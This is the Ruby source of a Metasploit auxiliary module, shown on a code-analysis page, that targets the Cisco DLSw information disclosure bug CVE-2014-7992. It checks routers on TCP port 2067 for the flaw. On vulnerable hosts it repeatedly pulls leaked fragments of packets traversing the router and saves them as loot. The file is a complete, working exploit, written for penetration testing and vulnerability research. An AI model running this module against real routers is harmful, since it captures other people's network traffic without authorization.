modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb from rapid7/metasploit-framework

modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb
Summary

Maintainability

3 hrs
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'socket'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'           => 'Cisco DLSw Information Disclosure Scanner',
      'Description'    => %q(
        This module implements the DLSw information disclosure retrieval. There
        is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains
        that allows an unauthenticated remote attacker to retrieve the partial
        contents of packets traversing a Cisco router with DLSw configured
        and active.
      ),
      'Author'         => [
        'Tate Hansen', # Vulnerability discovery
        'John McLeod', # Vulnerability discovery
        'Kyle Rainey' # Built lab to recreate vulnerability and help test
      ],
      'References'     =>
        [
          ['CVE', '2014-7992'],
          ['URL', 'https://github.com/tt5555/dlsw_exploit']
        ],
      'DisclosureDate' => 'Nov 17 2014',
      'License'        => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(2067),
        OptInt.new('LEAK_AMOUNT', [true, 'The number of bytes to store before shutting down.', 1024])
      ])
  end

  def get_response(size = 72)
    connect
    response = sock.get_once(size)
    disconnect
    response
  end

  # Called when using check
  def check_host(_ip)
    print_status("Checking for DLSw information disclosure (CVE-2014-7992)")
    response = get_response

    if response.blank?
      vprint_status("No response")
      Exploit::CheckCode::Safe
    elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48"
      vprint_good("Detected DLSw protocol")
      report_service(
        host: rhost,
        port: rport,
        proto: 'tcp',
        name: 'dlsw'
      )
      # TODO: check that response has something that truly indicates it is vulnerable
      # and not simply that it responded
      unless response[18..72].scan(/\x00/).length == 54
        print_good("Vulnerable to DLSw information disclosure; leaked #{response.length} bytes")
        report_vuln(
          host: rhost,
          port: rport,
          name: name,
          refs: references,
          info: "Module #{fullname} collected #{response.length} bytes"
        )
        Exploit::CheckCode::Vulnerable
      end
    else
      vprint_status("#{response.size}-byte response didn't contain any leaked data")
      Exploit::CheckCode::Safe
    end
  end

  # Main method
  def run_host(ip)
    return unless check_host(ip) == Exploit::CheckCode::Vulnerable

    dlsw_data = ''
    until dlsw_data.length > datastore['LEAK_AMOUNT']
      response = get_response
      dlsw_data << response[18..72] unless response.blank?
    end
    loot_and_report(dlsw_data)
  end

  def loot_and_report(dlsw_leak)
    path = store_loot(
      'dlsw.packet.contents',
      'application/octet-stream',
      rhost,
      dlsw_leak,
      'DLSw_leaked_data',
      'DLSw packet memory leak'
    )
    print_status("DLSw leaked data stored in #{path}")
  end
end